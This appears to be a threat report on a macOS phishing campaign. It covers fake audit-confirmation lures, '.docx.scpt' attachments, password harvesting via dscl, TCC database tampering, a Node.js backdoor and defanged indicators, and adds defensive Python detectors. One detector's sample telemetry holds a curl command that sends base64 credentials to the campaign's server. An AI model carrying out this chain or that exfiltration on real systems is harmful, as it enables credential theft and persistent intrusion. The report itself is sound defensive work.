A sophisticated phishing campaign targeting macOS users poses as urgent business requests, such as an "audit/compliance confirmation," to trick victims into opening malicious attachments. The attachments, disguised as Word or PDF files, deliver fileless malware that establishes persistent remote access and steals credentials. The campaign opens with emails asking recipients to "confirm the company's legal English name."

Attackers follow up with pretexts such as "FY2025 External Audit" or "Token Vesting Confirmation submission deadline." Victims receive attachments with names like "Confirmation_Token_Vesting.docx.scpt": the double extension makes the file look like a harmless DOCX, but it is an AppleScript (.scpt) file. The lure nudges users into enabling macros or granting permissions, which kicks off a multi-stage infection chain that runs mostly in memory to avoid detection.

Analysis of Malware and Attack Chain

The first stage is the original AppleScript. It opens the Software Update pane in macOS System Settings, leading users to believe the system is updating or repairing itself.

Emails for Compliance Data Theft (Source: Medium)

It then collects the system language, macOS version, and CPU architecture (Intel or Apple Silicon).

This data is sent to a remote server at sevrrhst[.]com, which selects the next payload. The script then downloads and executes a second malicious AppleScript from the same domain and cleans up its traces. To build trust, the second script shows a fake progress bar claiming to "Fix system update issues" or "resolve document viewer problems."

Realistic phishing pop-ups that imitate macOS dialogs, complete with Google avatars, ask for the user's password.

Once the user enters a password and clicks OK, the script verifies it with the dscl command. Valid passwords are Base64-encoded together with the username and exfiltrated to sevrrhst[.]com with curl. The malware then targets the macOS TCC (Transparency, Consent, and Control) database to expand its access.
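The recon, dscl check and curl exfiltration above all show up as child processes of the script host, which is where a detection rule can sit. The block below is an added example (not code from the report or the Medium write-up) that runs such rules over process-execution events. The event shape is a constructed, simplified record rather than any EDR's schema; the allowlist, the list of fingerprinting binaries, the `dscl . -authonly <user> <password>` verb, and the `user:password` layout of the exfiltrated blob are all assumptions made for the example.

```python
"""
Added example: flag the osascript-driven recon, dscl credential check and
curl exfiltration described above in process-execution telemetry.
Event format, allowlist and sample values are constructed for the demo.
"""
import base64
import shlex
from urllib.parse import urlparse

# Assumption: outbound hosts the organisation treats as expected for curl.
ALLOWED_DOMAINS = {"apple.com", "swcdn.apple.com"}
# Parents that should not normally be spawning recon, dscl or curl.
SCRIPT_HOSTS = {"osascript", "Script Editor"}
# Assumed fingerprinting commands (macOS version, language, CPU architecture).
RECON_BINARIES = {"sw_vers", "uname", "defaults", "sysctl"}


def refang(text):
    """Turn a defanged indicator such as sevrrhst[.]com back into a hostname."""
    return text.replace("[.]", ".").replace("[. ]", ".")


def domain_allowed(host):
    host = refang(host).lower()
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


def decode_exfil_blob(blob):
    """Return decoded text if blob is valid base64 of printable ASCII, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    return text if text.isprintable() else None


def curl_findings(argv):
    """Extract destination host and any -d/--data body from a curl command line."""
    host, payload = None, None
    for i, arg in enumerate(argv[1:], start=1):
        if arg.startswith(("http://", "https://")):
            host = urlparse(refang(arg)).hostname
        elif arg in ("-d", "--data", "--data-raw", "--data-binary") and i + 1 < len(argv):
            payload = argv[i + 1]
    return host, payload


def classify_event(event):
    """Return (rule, detail) hits for one event; an empty list means nothing matched."""
    argv = shlex.split(event["cmdline"])
    if not argv:
        return []
    binary = argv[0].rsplit("/", 1)[-1]
    hits = []
    if event.get("parent") in SCRIPT_HOSTS and binary in RECON_BINARIES:
        hits.append(("recon", f"{binary} spawned by {event['parent']}"))
    if binary == "dscl" and "-authonly" in argv:
        # dscl . -authonly <user> <password> checks a password without logging in.
        idx = argv.index("-authonly")
        user = argv[idx + 1] if idx + 1 < len(argv) else "?"
        hits.append(("credential-check", f"dscl -authonly for user {user}"))
    if binary == "curl":
        host, payload = curl_findings(argv)
        if host and not domain_allowed(host):
            detail = f"request to non-allowlisted host {host}"
            decoded = decode_exfil_blob(payload) if payload else None
            if decoded:
                detail += f"; base64 body decodes to {decoded!r}"
            hits.append(("exfil", detail))
    return hits


def scan_events(events):
    return [{"rule": rule, "cmdline": ev["cmdline"], "detail": detail}
            for ev in events for rule, detail in classify_event(ev)]


# Constructed sample telemetry: the chain from the report plus one benign curl.
# The credential pair and user:password body layout are assumptions.
EXFIL_BLOB = base64.b64encode(b"alice:hunter2").decode()
SAMPLE_EVENTS = [
    {"parent": "osascript", "cmdline": "sw_vers -productVersion"},
    {"parent": "osascript", "cmdline": "uname -m"},
    {"parent": "osascript", "cmdline": "dscl . -authonly alice hunter2"},
    {"parent": "osascript",
     "cmdline": f"curl -s -X POST -d {EXFIL_BLOB} https://sevrrhst[.]com/inc/register.php"},
    {"parent": "Terminal", "cmdline": "curl -sO https://swcdn.apple.com/content/update.pkg"},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] {hit['detail']}  <- {hit['cmdline']}")
```

Decoding the curl body during triage is what turns a generic "unknown domain" alert into a concrete credential-compromise finding; the dscl rule is useful on its own because a password check that never leads to an interactive login has few legitimate callers outside IT tooling.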

According to the Medium write-up, it renames TCC directories such as com.apple.TCC to evade detection, then inserts SQL rows that silently grant permissions to Script Editor, Bash, Terminal, and itself. This gives it automatic access to files (Documents, Desktop, Downloads, and external drives), the camera, screen capture, keyboard monitoring, and Accessibility. The script then downloads an encrypted payload (referred to as "origin"), decodes it, drops it to disk, and executes it, creating a backdoor through which the C2 server can send remote Bash commands.
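Grants written straight into TCC.db leave a footprint that is easy to audit: allowed rows for shells, Terminal or Script Editor on sensitive services, usually without the code-signing requirement TCC records when a user approves a prompt, and a renamed com.apple.TCC directory beside the real one. The block below is an added example (not code from the report or the Medium write-up) that checks both. The in-memory table it builds is a simplified reconstruction of the `access` table with only the columns the check needs; the real schema has more columns and varies across macOS versions, and the service names, client identifiers and `auth_value = 2` meaning "allowed" are taken from current TCC.db layouts and should be treated as assumptions to verify on the version at hand.

```python
"""
Added example: audit a TCC database for grants of the kind the script
inserts and for a renamed com.apple.TCC directory. The sample table is a
simplified reconstruction of TCC.db's 'access' table, not the real schema.
"""
import os
import sqlite3
import tempfile

USER_TCC_DB = os.path.expanduser("~/Library/Application Support/com.apple.TCC/TCC.db")
AUTH_ALLOWED = 2  # auth_value for "allowed" in current TCC.db versions (assumption)

# TCC services behind the capabilities the report lists.
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceSystemPolicyDocumentsFolder": "Documents folder",
    "kTCCServiceSystemPolicyDesktopFolder": "Desktop folder",
    "kTCCServiceSystemPolicyDownloadsFolder": "Downloads folder",
    "kTCCServiceSystemPolicyRemovableVolumes": "External drives",
    "kTCCServiceCamera": "Camera",
    "kTCCServiceScreenCapture": "Screen capture",
    "kTCCServiceListenEvent": "Keyboard monitoring",
    "kTCCServiceAccessibility": "Accessibility",
}
# Clients the script grants access to, as bundle ids (client_type 0) or paths (1).
SCRIPT_CLIENTS = {"com.apple.Terminal", "com.apple.ScriptEditor2",
                  "/bin/bash", "/bin/zsh", "/bin/sh", "/usr/bin/osascript"}


def find_suspicious_grants(conn):
    """Allowed grants of sensitive services to shells, terminals or script hosts.

    csreq holds the code-signing requirement TCC stores when a user approves a
    prompt; rows inserted by hand with SQL commonly leave it NULL, so a missing
    csreq is reported as an extra signal.
    """
    query = ("SELECT service, client, client_type, csreq FROM access "
             "WHERE auth_value = ? ORDER BY client, service")
    findings = []
    for service, client, client_type, csreq in conn.execute(query, (AUTH_ALLOWED,)):
        if service in SENSITIVE_SERVICES and client in SCRIPT_CLIENTS:
            findings.append({
                "client": client,
                "client_type": "path" if client_type == 1 else "bundle id",
                "capability": SENSITIVE_SERVICES[service],
                "csreq_missing": csreq is None,
            })
    return findings


def find_tcc_dir_anomalies(app_support_dir):
    """Report a missing com.apple.TCC directory and any renamed lookalikes beside it."""
    names = os.listdir(app_support_dir)
    lookalikes = sorted(n for n in names
                        if n.lower().startswith("com.apple.tcc") and n != "com.apple.TCC")
    return {"canonical_present": "com.apple.TCC" in names, "lookalikes": lookalikes}


def build_sample_db():
    """Constructed rows: one ordinary prompt-approved grant, three grants of the
    kind the script inserts (no csreq), and one denied entry that must not match."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""
        CREATE TABLE access (
            service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL,
            auth_value INTEGER NOT NULL, auth_reason INTEGER NOT NULL,
            auth_version INTEGER NOT NULL, csreq BLOB,
            PRIMARY KEY (service, client, client_type))""")
    rows = [
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, 1, b"\xfa\xde\x0c\x00"),
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, 1, None),
        ("kTCCServiceScreenCapture", "/bin/bash", 1, 2, 2, 1, None),
        ("kTCCServiceListenEvent", "com.apple.ScriptEditor2", 0, 2, 2, 1, None),
        ("kTCCServiceMicrophone", "com.apple.Terminal", 0, 0, 2, 1, None),
    ]
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?, ?)", rows)
    return conn


def build_sample_app_support():
    """Temp directory imitating Application Support after the rename trick."""
    root = tempfile.mkdtemp(prefix="appsupport-")
    os.mkdir(os.path.join(root, "com.apple.TCC.old"))
    os.mkdir(os.path.join(root, "com.apple.sharedfilelist"))
    return root


if __name__ == "__main__":
    # Reading the real file itself requires Full Disk Access for the terminal.
    if os.access(USER_TCC_DB, os.R_OK):
        conn = sqlite3.connect(f"file:{USER_TCC_DB}?mode=ro", uri=True)
        app_support = os.path.dirname(os.path.dirname(USER_TCC_DB))
    else:
        conn, app_support = build_sample_db(), build_sample_app_support()
    for f in find_suspicious_grants(conn):
        flag = " [no csreq]" if f["csreq_missing"] else ""
        print(f"{f['client']} ({f['client_type']}): {f['capability']}{flag}")
    print(find_tcc_dir_anomalies(app_support))
```

Run against the live database the check needs the auditing terminal to hold Full Disk Access itself, which is worth remembering when interpreting a Terminal row: confirm whether it was granted through System Settings by the user or appeared without a prompt.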

It installs a Node.js runtime, then fetches and runs "index.js" via a "req=skip" request.

Data Stealing via Compliance Emails (Source: Medium)

The Node.js core (index.js) reports system details including OS version, CPU, disk, network, and running processes. The server replies with additional code that is executed dynamically with eval().

This lets the operation grow on demand, adding data theft or further persistence through legitimate tools used for stealth.

IOCs and Malicious Infrastructure

Threat intelligence shows sevrrhst[.]com was registered on January 23, 2026. It resolves to IP 88.119.171.59, which is shared with more than ten similar domains, including tattomc[.]com and stomcs[.]com.

It uses a free TLS certificate and shows fast-flux characteristics. This is a complete intrusion chain that uses dynamic code and built-in system tools to evade detection, not just a simple stealer, and static antivirus software struggles with it.

Indicator Type   Value
Filename         Confirmation_Token_Vesting.docx.scpt
SHA256           3e4d35903c51db3da8d4bd77491b5c181b7361aaf152609d03a1e2bb86faee43
Filename         env_arm.zip
SHA256           f9e0376114c57d659025ceb46f1ef48aa80b8af5909b2de0cf80e88040fef345
Filename         index.js
SHA256           0f1e457488fe799dee7ace7e1bc2df4c1793245f334a4298035652ebeb249414
URL              https://sevrrhst[.]com/css/controller.php
URL              https://sevrrhst[.]com/inc/register.php
C2 Domain        sevrrhst[.]com
IP               88.119.171.59
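The indicators above, together with the double-extension naming trick described earlier in the article, can be checked mechanically across mailbox attachments and proxy or mail logs. The block below is an added example (not code from the report): the hashes, domains, URL paths and IP are copied from the table; the attachment files and proxy log line are constructed, and the extension lists are the author's own choice of what counts as document-like and executable on macOS.

```python
"""
Added example: triage a directory and free text against the IOCs above and
the document.scpt double-extension lure. Sample files and log line are
constructed; the hash of the placeholder attachment will not match.
"""
import hashlib
import os
import re
import tempfile

IOC_SHA256 = {
    "3e4d35903c51db3da8d4bd77491b5c181b7361aaf152609d03a1e2bb86faee43": "Confirmation_Token_Vesting.docx.scpt",
    "f9e0376114c57d659025ceb46f1ef48aa80b8af5909b2de0cf80e88040fef345": "env_arm.zip",
    "0f1e457488fe799dee7ace7e1bc2df4c1793245f334a4298035652ebeb249414": "index.js",
}
IOC_DOMAINS = {"sevrrhst.com", "tattomc.com", "stomcs.com"}
IOC_IPS = {"88.119.171.59"}
IOC_URL_PATHS = {"/css/controller.php", "/inc/register.php"}

# A document-looking extension immediately followed by one macOS will execute.
DOCUMENT_SUFFIXES = {"doc", "docx", "pdf", "xls", "xlsx", "txt", "rtf"}
EXECUTABLE_SUFFIXES = {"scpt", "applescript", "app", "sh", "command", "pkg", "dmg"}


def refang(text):
    """Undo common defanging so indicators compare directly with log content."""
    return text.replace("[.]", ".").replace("[. ]", ".").replace("hxxp", "http")


def is_double_extension_lure(filename):
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DOCUMENT_SUFFIXES and parts[2] in EXECUTABLE_SUFFIXES


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_directory(root):
    """(rule, path, detail) for hash matches and double-extension lures under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            digest = sha256_of(path)
            if digest in IOC_SHA256:
                findings.append(("hash-match", path, IOC_SHA256[digest]))
            if is_double_extension_lure(name):
                findings.append(("double-extension", path, name.rsplit(".", 1)[1]))
    return findings


def find_indicators_in_text(text):
    """Pull IOC domains, IPs and URL paths out of free text such as proxy logs."""
    text = refang(text)
    hosts = {h.lower() for h in re.findall(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", text, re.I)}
    ips = set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text))
    paths = {p for p in IOC_URL_PATHS if p in text}
    return {"domains": sorted(hosts & IOC_DOMAINS),
            "ips": sorted(ips & IOC_IPS),
            "url_paths": sorted(paths)}


def build_sample_mailbox():
    """Constructed attachments: the lure's filename with harmless content, plus a PDF."""
    root = tempfile.mkdtemp(prefix="attachments-")
    with open(os.path.join(root, "Confirmation_Token_Vesting.docx.scpt"), "w") as f:
        f.write('display dialog "placeholder"\n')  # not the real script
    with open(os.path.join(root, "FY2025_audit.pdf"), "wb") as f:
        f.write(b"%PDF-1.4 placeholder")
    return root


# Constructed proxy log line in defanged form, as it might be pasted from a report.
SAMPLE_PROXY_LOG = (
    "2026-01-24T10:02:11Z CONNECT sevrrhst[.]com:443 dst=88.119.171.59 "
    "uri=https://sevrrhst[.]com/inc/register.php user=alice\n"
)

if __name__ == "__main__":
    for rule, path, detail in scan_directory(build_sample_mailbox()):
        print(f"[{rule}] {path}: {detail}")
    print(find_indicators_in_text(SAMPLE_PROXY_LOG))
```

The filename heuristic is deliberately independent of the hashes: a re-packed lure changes its SHA256 but keeps the `.docx.scpt` trick, so on a mail gateway the extension rule is the one that keeps firing after the indicators rotate.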